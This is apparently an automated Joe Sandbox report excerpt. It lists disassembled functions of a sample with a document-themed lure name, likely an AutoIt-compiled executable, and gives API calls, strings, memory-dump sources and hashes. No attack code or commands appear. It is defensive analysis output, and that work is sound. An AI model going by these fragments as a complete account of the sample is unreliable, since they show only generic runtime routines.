                                                      Function 00298D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00298E14
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 002D6AC5
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002D6AFE
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002D6F43
                                                        • Part of subcall function 00298F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00298BE8,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298FC5
                                                      • SendMessageW.USER32(?,00001053), ref: 002D6F7F
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002D6F96
                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 002D6FAC
                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 002D6FB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 2760611726-4108050209
                                                      • Opcode ID: 4e341254e8b673a7ff5d3904dbb34b0e8a192665cbb3eec14fe53e57d11096d8
                                                      • Instruction ID: 972c2d457559b85e94faa19c83a517319fd1d35b29ea439595666cbcbc41dfef
                                                      • Opcode Fuzzy Hash: 4e341254e8b673a7ff5d3904dbb34b0e8a192665cbb3eec14fe53e57d11096d8
                                                      • Instruction Fuzzy Hash: FB12AF30620212DFDB26CF24D858BB9B7E5FB49305F18846AF4958B661CB71EC61CF91
                                                      Function 00302711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 0030273E
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0030286A
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003028A9
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003028B9
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00302900
                                                      • GetClientRect.USER32(00000000,?), ref: 0030290C
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00302955
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00302964
                                                      • GetStockObject.GDI32(00000011), ref: 00302974
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00302978
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00302988
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00302991
                                                      • DeleteDC.GDI32(00000000), ref: 0030299A
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003029C6
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 003029DD
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00302A1D
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00302A31
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00302A42
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00302A77
                                                      • GetStockObject.GDI32(00000011), ref: 00302A82
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00302A8D
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00302A97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: af5c7f2ffddf8815778a484bf38603cfebe709d1fc9867523d5a809b8000c913
                                                      • Instruction ID: da08670607146a78a9f2218ad831b66b68bd442147ff82a4f980e97b55dfda3b
                                                      • Opcode Fuzzy Hash: af5c7f2ffddf8815778a484bf38603cfebe709d1fc9867523d5a809b8000c913
                                                      • Instruction Fuzzy Hash: 65B15975A51215AFEB15DFA8CC49FAA7BA9EB08711F008114F914EB2E1D774AD40CBA0
                                                      Function 002F4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 002F4AED
                                                      • GetDriveTypeW.KERNEL32(?,0031CB68,?,\\.\,0031CC08), ref: 002F4BCA
                                                      • SetErrorMode.KERNEL32(00000000,0031CB68,?,\\.\,0031CC08), ref: 002F4D36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: d693dc0da7c32e61e1bd54cf4791ba3df2003a98bed5aca7d026921882bb018b
                                                      • Instruction ID: ab3dd28d11cea3e614af43d09705343513f829dbaee0e23f8bd7c639bb370187
                                                      • Opcode Fuzzy Hash: d693dc0da7c32e61e1bd54cf4791ba3df2003a98bed5aca7d026921882bb018b
                                                      • Instruction Fuzzy Hash: DF61F83067110E9BCB05FF14C9829BAF7A0AB46794B205136F9069B291CBF1ED61DB52
                                                      Function 003173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00317421
                                                      • SetTextColor.GDI32(?,?), ref: 00317425
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0031743B
                                                      • GetSysColor.USER32(0000000F), ref: 00317446
                                                      • CreateSolidBrush.GDI32(?), ref: 0031744B
                                                      • GetSysColor.USER32(00000011), ref: 00317463
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00317471
                                                      • SelectObject.GDI32(?,00000000), ref: 00317482
                                                      • SetBkColor.GDI32(?,00000000), ref: 0031748B
                                                      • SelectObject.GDI32(?,?), ref: 00317498
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003174B7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003174CE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 003174DB
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0031752A
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00317554
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00317572
                                                      • DrawFocusRect.USER32(?,?), ref: 0031757D
                                                      • GetSysColor.USER32(00000011), ref: 0031758E
                                                      • SetTextColor.GDI32(?,00000000), ref: 00317596
                                                      • DrawTextW.USER32(?,003170F5,000000FF,?,00000000), ref: 003175A8
                                                      • SelectObject.GDI32(?,?), ref: 003175BF
                                                      • DeleteObject.GDI32(?), ref: 003175CA
                                                      • SelectObject.GDI32(?,?), ref: 003175D0
                                                      • DeleteObject.GDI32(?), ref: 003175D5
                                                      • SetTextColor.GDI32(?,?), ref: 003175DB
                                                      • SetBkColor.GDI32(?,?), ref: 003175E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: 60895887cdc9ef0640883113a66885cb8bc3d47fc2c5d16f8e1d3e307adea44b
                                                      • Instruction ID: 0d84896292fb51ce7911dfe2b2c51f8395c24f4bf4c6952272379ac323425b78
                                                      • Opcode Fuzzy Hash: 60895887cdc9ef0640883113a66885cb8bc3d47fc2c5d16f8e1d3e307adea44b
                                                      • Instruction Fuzzy Hash: 65616D72940218BFDF069FA4DC49AEEBFB9EB0D320F159125F911AB2A1D7709940CF90
                                                      Function 00310FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00311128
                                                      • GetDesktopWindow.USER32 ref: 0031113D
                                                      • GetWindowRect.USER32(00000000), ref: 00311144
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00311199
                                                      • DestroyWindow.USER32(?), ref: 003111B9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003111ED
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0031120B
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0031121D
                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00311232
                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00311245
                                                      • IsWindowVisible.USER32(00000000), ref: 003112A1
                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003112BC
                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003112D0
                                                      • GetWindowRect.USER32(00000000,?), ref: 003112E8
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0031130E
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00311328
                                                      • CopyRect.USER32(?,?), ref: 0031133F
                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 003113AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: b7285bdcbb208d64200ceff74a6417ad365ad4c28e695f175dd249db6683a4d7
                                                      • Instruction ID: 902989e51edd21eff1c738cd5fa7c4ef5932c83387e8fafc4d7e3802fe43cb90
                                                      • Opcode Fuzzy Hash: b7285bdcbb208d64200ceff74a6417ad365ad4c28e695f175dd249db6683a4d7
                                                      • Instruction Fuzzy Hash: E5B18C71618341AFD705DF64C884BAABBE4FF89750F00891CFA999B2A1C771E885CF91
                                                      Function 00298891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00298968
                                                      • GetSystemMetrics.USER32(00000007), ref: 00298970
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0029899B
                                                      • GetSystemMetrics.USER32(00000008), ref: 002989A3
                                                      • GetSystemMetrics.USER32(00000004), ref: 002989C8
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002989E5
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002989F5
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00298A28
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00298A3C
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00298A5A
                                                      • GetStockObject.GDI32(00000011), ref: 00298A76
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00298A81
                                                        • Part of subcall function 0029912D: GetCursorPos.USER32(?), ref: 00299141
                                                        • Part of subcall function 0029912D: ScreenToClient.USER32(00000000,?), ref: 0029915E
                                                        • Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000001), ref: 00299183
                                                        • Part of subcall function 0029912D: GetAsyncKeyState.USER32(00000002), ref: 0029919D
                                                      • SetTimer.USER32(00000000,00000000,00000028,002990FC), ref: 00298AA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 42120b2609c18a693b20c0a436164c045a23d20faeeb12031d75bd36844d1dc3
                                                      • Instruction ID: cb1b63d06969cdf15d247d78b6267c1c185342539eb3170e05eed5cb73a7a2ef
                                                      • Opcode Fuzzy Hash: 42120b2609c18a693b20c0a436164c045a23d20faeeb12031d75bd36844d1dc3
                                                      • Instruction Fuzzy Hash: D5B17C31A5020A9FDF15DFA8C849BEE7BB5FB48315F14412AFA15EB2A0DB74A850CF50
                                                      Function 002E0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1114
                                                        • Part of subcall function 002E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1120
                                                        • Part of subcall function 002E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E112F
                                                        • Part of subcall function 002E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1136
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002E0DF5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002E0E29
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0E40
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 002E0E7A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002E0E96
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0EAD
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002E0EB5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 002E0EBC
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002E0EDD
                                                      • CopySid.ADVAPI32(00000000), ref: 002E0EE4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002E0F13
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002E0F35
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002E0F47
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0F6E
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0F75
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0F7E
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0F85
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0F8E
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0F95
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002E0FA1
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0FA8
                                                        • Part of subcall function 002E1193: GetProcessHeap.KERNEL32(00000008,002E0BB1,?,00000000,?,002E0BB1,?), ref: 002E11A1
                                                        • Part of subcall function 002E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,002E0BB1,?), ref: 002E11A8
                                                        • Part of subcall function 002E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002E0BB1,?), ref: 002E11B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: 7ee07050aebab8a15665e929f6029561eaa01cf3bc442610abe2b2ac3b0a46c0
                                                      • Instruction ID: eadbd12e824a06d156dd015004b4648f78c9c3069b170be0bb7d0aaf6a638906
                                                      • Opcode Fuzzy Hash: 7ee07050aebab8a15665e929f6029561eaa01cf3bc442610abe2b2ac3b0a46c0
                                                      • Instruction Fuzzy Hash: 5771907199024AABDF21DFA5DC84FEEBBBCBF08300F448125F919A6151DB709D65CB60
                                                      Function 0030C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030C4BD
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0031CC08,00000000,?,00000000,?,?), ref: 0030C544
                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0030C5A4
                                                      • _wcslen.LIBCMT ref: 0030C5F4
                                                      • _wcslen.LIBCMT ref: 0030C66F
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0030C6B2
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0030C7C1
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0030C84D
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030C881
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030C88E
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0030C960
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 9721498-966354055
                                                      • Opcode ID: 61e095b4ddb536cc0b3a56583919c8f3090400b97eb99afdc5ff76c31fec4481
                                                      • Instruction ID: 4f46d22243e4332c7b00eb8d6baadded2bbcc3ada4fc4df2116cca80f2497b28
                                                      • Opcode Fuzzy Hash: 61e095b4ddb536cc0b3a56583919c8f3090400b97eb99afdc5ff76c31fec4481
                                                      • Instruction Fuzzy Hash: A91298392252009FD715EF14C891A2AB7E5FF88714F15899CF89A9B3A2DB30EC51CF91
                                                      Function 0031091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 003109C6
                                                      • _wcslen.LIBCMT ref: 00310A01
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00310A54
                                                      • _wcslen.LIBCMT ref: 00310A8A
                                                      • _wcslen.LIBCMT ref: 00310B06
                                                      • _wcslen.LIBCMT ref: 00310B81
                                                        • Part of subcall function 0029F9F2: _wcslen.LIBCMT ref: 0029F9FD
                                                        • Part of subcall function 002E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002E2BFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 1103490817-4258414348
                                                      • Opcode ID: 9b7105cdf340ddeffad41bee213a713df18355c5e7e28ca6dbe473cfa29137c4
                                                      • Instruction ID: 1123fed7398808e1396e7b1acea27f81d1113725f5407371868d7dd62b163848
                                                      • Opcode Fuzzy Hash: 9b7105cdf340ddeffad41bee213a713df18355c5e7e28ca6dbe473cfa29137c4
                                                      • Instruction Fuzzy Hash: 98E1DC352183018FCB19EF24C4508AAB7E5FF98304B51895CF896AB7A2DB70ED95CF81
                                                      Function 0030C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1256254125-909552448
                                                      • Opcode ID: 916de4398a53310d73eafe39f94b4a674dc2563a4c55d79f0dfce1804daf0a76
                                                      • Instruction ID: b617dc2c3328e53415730b334d7ef6ebeccecd927878b79fe93ef7f5763d5e87
                                                      • Opcode Fuzzy Hash: 916de4398a53310d73eafe39f94b4a674dc2563a4c55d79f0dfce1804daf0a76
                                                      • Instruction Fuzzy Hash: 6E71253263116A8BCB22DF7CC9615BF3395ABA1750B261724FC569B2C0EB34DD5187A0
                                                      Function 0031833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0031835A
                                                      • _wcslen.LIBCMT ref: 0031836E
                                                      • _wcslen.LIBCMT ref: 00318391
                                                      • _wcslen.LIBCMT ref: 003183B4
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003183F2
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0031361A,?), ref: 0031844E
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00318487
